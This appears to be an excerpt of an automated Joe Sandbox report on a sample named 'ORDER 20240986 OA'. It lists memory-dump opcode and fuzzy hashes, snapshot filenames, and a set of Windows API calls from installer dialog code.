                                                                                                                                                  • Opcode Fuzzy Hash: 07aff5372315b48395939c0c83654b0c4d339e930d4fac7216781912fd46e400
                                                                                                                                                  • Instruction Fuzzy Hash: 4BC1C274E01218CFDB14CFA5C994B9DBBB2BF89301F1081A9D809AB365DB359E86CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950484955.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7560000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 97cca32d542c0e4ccbedc26a367c03d3cb228c88d29610e437a8522a12a582e4
                                                                                                                                                  • Instruction ID: 60a63545e9709a050b38c165f7546f5418cefc760ef5a4b6821a783405b338df
                                                                                                                                                  • Opcode Fuzzy Hash: 97cca32d542c0e4ccbedc26a367c03d3cb228c88d29610e437a8522a12a582e4
                                                                                                                                                  • Instruction Fuzzy Hash: E6D1A0B4E00218CFDB54DFA9C994B9DBBB2BF89300F1080A9D909AB355DB359D86CF51
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950484955.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7560000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: f1dd669914941401cdb49b8b3da5e3087dfdd911d4766c7a8ca0eeb087a82057
                                                                                                                                                  • Instruction ID: 76f49572c1ea3f36e34aadaae46cbf1995a2299609f1a7a73804cfab91d37d9d
                                                                                                                                                  • Opcode Fuzzy Hash: f1dd669914941401cdb49b8b3da5e3087dfdd911d4766c7a8ca0eeb087a82057
                                                                                                                                                  • Instruction Fuzzy Hash: 97D1A0B4E00218CFDB54DFA9C994B9DBBB2BF89300F1080A9D908AB355DB359D86CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950484955.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7560000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 121bf5f48f9a00a84c53cbcb9ee4b3ba07ae6c4200be83a6fc3092a5da48a62a
                                                                                                                                                  • Instruction ID: b327c287cecc277e45f642365aa79b45bb48f14fee7d100aae372a1c4bed14d4
                                                                                                                                                  • Opcode Fuzzy Hash: 121bf5f48f9a00a84c53cbcb9ee4b3ba07ae6c4200be83a6fc3092a5da48a62a
                                                                                                                                                  • Instruction Fuzzy Hash: 3AD1A0B4E00218CFDB54CFA9C994B9DBBB2BF89300F5080A9D909AB355DB359D86CF51
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950484955.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7560000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e70bedf9436914823f41a061da28e2ca42e28629c2c89c7bdd815ee17639f6e0
                                                                                                                                                  • Instruction ID: 6b0df2156565888f58dbc8a91500dbc77316f808d0ba1df057cb74387b1201f5
                                                                                                                                                  • Opcode Fuzzy Hash: e70bedf9436914823f41a061da28e2ca42e28629c2c89c7bdd815ee17639f6e0
                                                                                                                                                  • Instruction Fuzzy Hash: D3D1A0B4E00258CFDB54DFA5C994B9DBBB2BF89300F1080A9D908AB355DB359E86CF51
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950484955.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7560000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ad1e665918e5554c1ffdde3dd245fe8c5ab31347e3a8fa890d118214eb975601
                                                                                                                                                  • Instruction ID: 37440e5a010a9c60ca29d9d7bb5426503da873fb1b86aebe8d7630d1544b7936
                                                                                                                                                  • Opcode Fuzzy Hash: ad1e665918e5554c1ffdde3dd245fe8c5ab31347e3a8fa890d118214eb975601
                                                                                                                                                  • Instruction Fuzzy Hash: 7FD1AF74E00218CFDB54CFA9C994B9DBBB2BF89300F1081A9D908AB355DB759E86CF51
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950484955.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7560000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7d47a0eef1a63e55697832d1108a79fb0603a2d7ed76d4db003abfd281395e30
                                                                                                                                                  • Instruction ID: 5272bd0e6dda2da166450fc0cc228880b4f41a908eb45fcccd438edca18eaa3b
                                                                                                                                                  • Opcode Fuzzy Hash: 7d47a0eef1a63e55697832d1108a79fb0603a2d7ed76d4db003abfd281395e30
                                                                                                                                                  • Instruction Fuzzy Hash: C4D1A074E00218CFDB54CFA9C994B9DBBB2BF89300F1480A9D908AB355DB759E86CF51
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950484955.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7560000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 77dd273fd352b297a1b1bfbb7e9af0070005c0400b4dcf88d0da0016be2331ff
                                                                                                                                                  • Instruction ID: e307800a0ff9c0ac6363474e9e5ee81d69e9a9adfae82ede324385614ee05fe2
                                                                                                                                                  • Opcode Fuzzy Hash: 77dd273fd352b297a1b1bfbb7e9af0070005c0400b4dcf88d0da0016be2331ff
                                                                                                                                                  • Instruction Fuzzy Hash: 5AD1AFB4E00218CFDB54CFA9C994B9DBBB2BF89300F1080A9D908AB355DB759D86CF51
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950484955.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7560000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: fb5cf8649c5d1b0b3039673816fecfd20aa653d3a40e94048fa2ed42025b7d43
                                                                                                                                                  • Instruction ID: 1055a3c26a9a39cd19a5cf7ee1695512d30b7a54c4625d8bdfb37d31dbc3e167
                                                                                                                                                  • Opcode Fuzzy Hash: fb5cf8649c5d1b0b3039673816fecfd20aa653d3a40e94048fa2ed42025b7d43
                                                                                                                                                  • Instruction Fuzzy Hash: AAD1A074E00258CFDB54CFA5C994B9DBBB2BF89300F5080A9D508AB355DB759E82CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950484955.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7560000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: fa21d73fa95e33f5a38f823f04b3086ec0a94f9b4a98a1d3a651fcf250af1200
                                                                                                                                                  • Instruction ID: 86bb6e79096140d989c08f3b8f16da67410f021a086ccd55e6c324242e3efefd
                                                                                                                                                  • Opcode Fuzzy Hash: fa21d73fa95e33f5a38f823f04b3086ec0a94f9b4a98a1d3a651fcf250af1200
                                                                                                                                                  • Instruction Fuzzy Hash: 9DD1A074E00218CFDB54DFA9C994B9DBBB2BF89300F1080A9D508AB355DB759D86CF51
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950484955.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7560000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a24a8ce7094b290805bf4d5e76cf7cc6a1d9d2f72e05d6c021494e1fab93da09
                                                                                                                                                  • Instruction ID: 64819c9900c3cb6b884bee4e688fc6a2a4124a2f44cfa743dcf42845cefd5eef
                                                                                                                                                  • Opcode Fuzzy Hash: a24a8ce7094b290805bf4d5e76cf7cc6a1d9d2f72e05d6c021494e1fab93da09
                                                                                                                                                  • Instruction Fuzzy Hash: 22D19FB4E00218CFDB54CFA9C994B9DBBB2BF89300F1080A9D909AB355DB759D86CF51
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950484955.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7560000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ea259e65175bc4662e37f6234b79f6830e66221cfdecc2d378d75a16ec792db6
                                                                                                                                                  • Instruction ID: 076b70ed544e73889e78f83a2f747bd5e574e06bcbb0d3aafce1ca65b0575340
                                                                                                                                                  • Opcode Fuzzy Hash: ea259e65175bc4662e37f6234b79f6830e66221cfdecc2d378d75a16ec792db6
                                                                                                                                                  • Instruction Fuzzy Hash: 20D1A0B4E00218CFDB54CFA9C994B9DBBB2BF89300F1080A9D509AB355DB759E86CF51
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950484955.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7560000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0ebb6299d1c154e49567612176bd1e259d453893177b68bf161ea61b88d1f50c
                                                                                                                                                  • Instruction ID: ed7e96c62d2708bda88143007e77bf4e6634b6c0cdd8eaefa4cd0278195ba6c7
                                                                                                                                                  • Opcode Fuzzy Hash: 0ebb6299d1c154e49567612176bd1e259d453893177b68bf161ea61b88d1f50c
                                                                                                                                                  • Instruction Fuzzy Hash: CED19074E00218CFDB54DFA9C994B9DBBB2BF89300F1080A9D908AB355DB759E86CF51
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950484955.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7560000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 105a82a4311010e8087ae26d39327fd821848925855464dc9705a7bb260d20b6
                                                                                                                                                  • Instruction ID: a071c712c507b692d1f93cfb0bd265f31b9a4fce536bd752b360707e3fed83ad
                                                                                                                                                  • Opcode Fuzzy Hash: 105a82a4311010e8087ae26d39327fd821848925855464dc9705a7bb260d20b6
                                                                                                                                                  • Instruction Fuzzy Hash: AAD1A0B4E00218CFDB54CFA5C994B9DBBB2BF89300F1080A9D908AB355DB759E86CF51
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950484955.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7560000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 74a144d3e47a201498889e53d5d1ddbc8692e53aed5b30b9965e9c87b88dbdef
                                                                                                                                                  • Instruction ID: 8ac456a91dcf077db38702bd26c43f5d56656d139d395ebeaeed3eb54874be2c
                                                                                                                                                  • Opcode Fuzzy Hash: 74a144d3e47a201498889e53d5d1ddbc8692e53aed5b30b9965e9c87b88dbdef
                                                                                                                                                  • Instruction Fuzzy Hash: 2AD1A0B4E00258CFDB54DFA5C994B9DBBB2BF89300F1080A9D908AB355DB359E86CF51
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950484955.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7560000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 301490ae2e4af0510e5c3e97db2c88ae6c79e771f6d1d8205be5fc784712f34a
                                                                                                                                                  • Instruction ID: e83137ae46feee3f9aab948f9a89f7852558da22fb9ea42627afb31f677d04b7
                                                                                                                                                  • Opcode Fuzzy Hash: 301490ae2e4af0510e5c3e97db2c88ae6c79e771f6d1d8205be5fc784712f34a
                                                                                                                                                  • Instruction Fuzzy Hash: B2D1A1B4E00218CFDB54DFA5C994B9DBBB2BF89300F1080A9D908AB355DB759E86CF51
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950484955.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7560000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e5779c5828bc2c27aaca88ae2481f41f78961b9ecb59542e0a5db8cd9b4abe09
                                                                                                                                                  • Instruction ID: 982142507e6ac9d676d656b099affe3b5e52fa9cebd2ce288a2d85fc4ff7eb06
                                                                                                                                                  • Opcode Fuzzy Hash: e5779c5828bc2c27aaca88ae2481f41f78961b9ecb59542e0a5db8cd9b4abe09
                                                                                                                                                  • Instruction Fuzzy Hash: 29D1A0B4E00218CFDB54CFA9C984B9DBBB2BF89300F1480A9D509AB355DB359D82CF51
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950484955.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7560000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c27f4315bcd652c046d6cd2156aeb02082008c0f74d6c7ca6711c556e1d70889
                                                                                                                                                  • Instruction ID: ba93140c77727a3e2ad015e6dc8c5c9f107144bdb94c41dbb02ecd667275779c
                                                                                                                                                  • Opcode Fuzzy Hash: c27f4315bcd652c046d6cd2156aeb02082008c0f74d6c7ca6711c556e1d70889
                                                                                                                                                  • Instruction Fuzzy Hash: 97D1A074E00218CFDB54CFA5C994B9DBBB2BF89300F1080A9D908AB355DB359E86CF51
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950484955.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7560000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2e9d7aade691a993c71509a09e411e79c5bddcb945f265a65756b704202bca7b
                                                                                                                                                  • Instruction ID: 9c18b4d1d83f28fbd1947076b56b9e7645d768708ef14b1376e4f48ad7bc60db
                                                                                                                                                  • Opcode Fuzzy Hash: 2e9d7aade691a993c71509a09e411e79c5bddcb945f265a65756b704202bca7b
                                                                                                                                                  • Instruction Fuzzy Hash: E1D1AF74E00218CFDB54DFA9C994B9DBBB2BF89300F5080A9D909AB355DB359E86CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950484955.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7560000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5ef86f111590d3f5dc42ea7ae3abf4b90360385ef097de50d3cd0fdca041b995
                                                                                                                                                  • Instruction ID: 733d65650e856eb39c4350be9a33743e059e435ee23d66fea3e87986751a8b86
                                                                                                                                                  • Opcode Fuzzy Hash: 5ef86f111590d3f5dc42ea7ae3abf4b90360385ef097de50d3cd0fdca041b995
                                                                                                                                                  • Instruction Fuzzy Hash: 8AD190B4E00218CFDB54DFA5C994B9DBBB2BF89300F1080A9D909AB355DB359E86CF51
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950484955.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7560000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 490080f36c40cc857887dfcc980586ec4d8d3b6efbacbe7f43364465816dcdc0
                                                                                                                                                  • Instruction ID: fee237e24528dd884eb968ec9fe2b992d97d95404874a4aff0b636c6fc76f0ef
                                                                                                                                                  • Opcode Fuzzy Hash: 490080f36c40cc857887dfcc980586ec4d8d3b6efbacbe7f43364465816dcdc0
                                                                                                                                                  • Instruction Fuzzy Hash: 2EC1B074E00218CFDB14DFA5C994BADBBB2BF89300F1480A9D809AB355DB359E86CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2974233369.000000003AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AC90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_3ac90000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 85c3712fe89120f7e1fb4b5823aceae2153f6316dffb17efa16b573aa3459f2d
                                                                                                                                                  • Instruction ID: bac27b55fd2088b905554379cd106c2f1d0bcb858f75cda641cb83f40f11c023
                                                                                                                                                  • Opcode Fuzzy Hash: 85c3712fe89120f7e1fb4b5823aceae2153f6316dffb17efa16b573aa3459f2d
                                                                                                                                                  • Instruction Fuzzy Hash: EDC19D74E01218CFDB54DFA5C994BDDBBB2AF89300F1081A9D809AB365DB359E86CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2974233369.000000003AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AC90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_3ac90000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 43fa9aac96a95e080e80b9da58b2d7903b91fe63ff80f8a3feab28507e8d66fb
                                                                                                                                                  • Instruction ID: 98cc6ba4f9e5647e34ea924d8fd639e705069b344a2385249fa02f8a32039937
                                                                                                                                                  • Opcode Fuzzy Hash: 43fa9aac96a95e080e80b9da58b2d7903b91fe63ff80f8a3feab28507e8d66fb
                                                                                                                                                  • Instruction Fuzzy Hash: EDC1AE78E01218CFDB54DFA5C994B9DBBB2BF89300F1081A9D409AB365DB359E86CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2974233369.000000003AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AC90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_3ac90000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2b99f30ca261d82fa1f94037e52ef93e5b66ac6a17f262fdfc456869ff052298
                                                                                                                                                  • Instruction ID: cd2614d582065e19ecce63002773cb4365d2c58a0c7daa08d876d7b90afbec4e
                                                                                                                                                  • Opcode Fuzzy Hash: 2b99f30ca261d82fa1f94037e52ef93e5b66ac6a17f262fdfc456869ff052298
                                                                                                                                                  • Instruction Fuzzy Hash: 64C19078E01218CFDB54DFA5C994BDDBBB2AF89300F1081A9D409AB365DB359E86CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2974233369.000000003AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AC90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_3ac90000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 356cf389133e9514a80af2b86567eba13f1239db57aaf7e89c86e78912afaf8c
                                                                                                                                                  • Instruction ID: cc7b19e1c17faf8ddb730a31fef1927673c65a123f59850e012a3ec9e1cc4a0c
                                                                                                                                                  • Opcode Fuzzy Hash: 356cf389133e9514a80af2b86567eba13f1239db57aaf7e89c86e78912afaf8c
                                                                                                                                                  • Instruction Fuzzy Hash: 2EC1AF74E01218CFDB54DFA5C994B9DBBB2BF89300F1480A9D809AB365DB359E86CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2974233369.000000003AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AC90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_3ac90000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 8c2c8846cd1df3ca795dedb2a720a68b7e0e02d5f0c245b6174735e88a4698bc
                                                                                                                                                  • Instruction ID: b2afaf08c9acae24e2ef5f3d57712e1bdf62e4ba792e841f054c7d4017da141b
                                                                                                                                                  • Opcode Fuzzy Hash: 8c2c8846cd1df3ca795dedb2a720a68b7e0e02d5f0c245b6174735e88a4698bc
                                                                                                                                                  • Instruction Fuzzy Hash: DFC19E74E01218CFDB54DFA5C994BDDBBB2AF89300F1081A9D809AB365DB359E86CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945076810.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_150000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 40f4eeb28eb7ab2548f26990f2eed62963e5c20a1f8083419e4255b3a874167c
                                                                                                                                                  • Instruction ID: 0aa4f3b4a8b181eae28aabb82895d3f457e13765802dadc599dea74ac794354f
                                                                                                                                                  • Opcode Fuzzy Hash: 40f4eeb28eb7ab2548f26990f2eed62963e5c20a1f8083419e4255b3a874167c
                                                                                                                                                  • Instruction Fuzzy Hash: 55514670D01208CBDB04DFA8D5587EEBBB2FB89301F249129D8247F295DB75A88ACF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945076810.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_150000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: fbf0df9b10cfeb114de5717e67e3be94b05c6cf54f3e69041474efc722100387
                                                                                                                                                  • Instruction ID: 165dea56900fa6f41edbd2290c946e762bf902790fb51b5602a666efe8e7934d
                                                                                                                                                  • Opcode Fuzzy Hash: fbf0df9b10cfeb114de5717e67e3be94b05c6cf54f3e69041474efc722100387
                                                                                                                                                  • Instruction Fuzzy Hash: D6512470D01208CBDB14DFA8D4987EEBBB2FB48302F209529D825BF295D775988ACF50
                                                                                                                                                  APIs
                                                                                                                                                  • GetDlgItem.USER32(?,00000403), ref: 0040549C
                                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004054AB
                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 004054E8
                                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 004054EF
                                                                                                                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405510
                                                                                                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405521
                                                                                                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405534
                                                                                                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405542
                                                                                                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405555
                                                                                                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405577
                                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 0040558B
                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004055AC
                                                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055BC
                                                                                                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055D5
                                                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055E1
                                                                                                                                                  • GetDlgItem.USER32(?,000003F8), ref: 004054BA
                                                                                                                                                    • Part of subcall function 00404243: SendMessageW.USER32(00000028,?,?,0040406E), ref: 00404251
                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004055FE
                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_000053D2,00000000), ref: 0040560C
                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00405613
                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00405637
                                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 0040563C
                                                                                                                                                  • ShowWindow.USER32(00000008), ref: 00405686
                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056BA
                                                                                                                                                  • CreatePopupMenu.USER32 ref: 004056CB
                                                                                                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056DF
                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004056FF
                                                                                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405718
                                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405750
                                                                                                                                                  • OpenClipboard.USER32(00000000), ref: 00405760
                                                                                                                                                  • EmptyClipboard.USER32 ref: 00405766
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405772
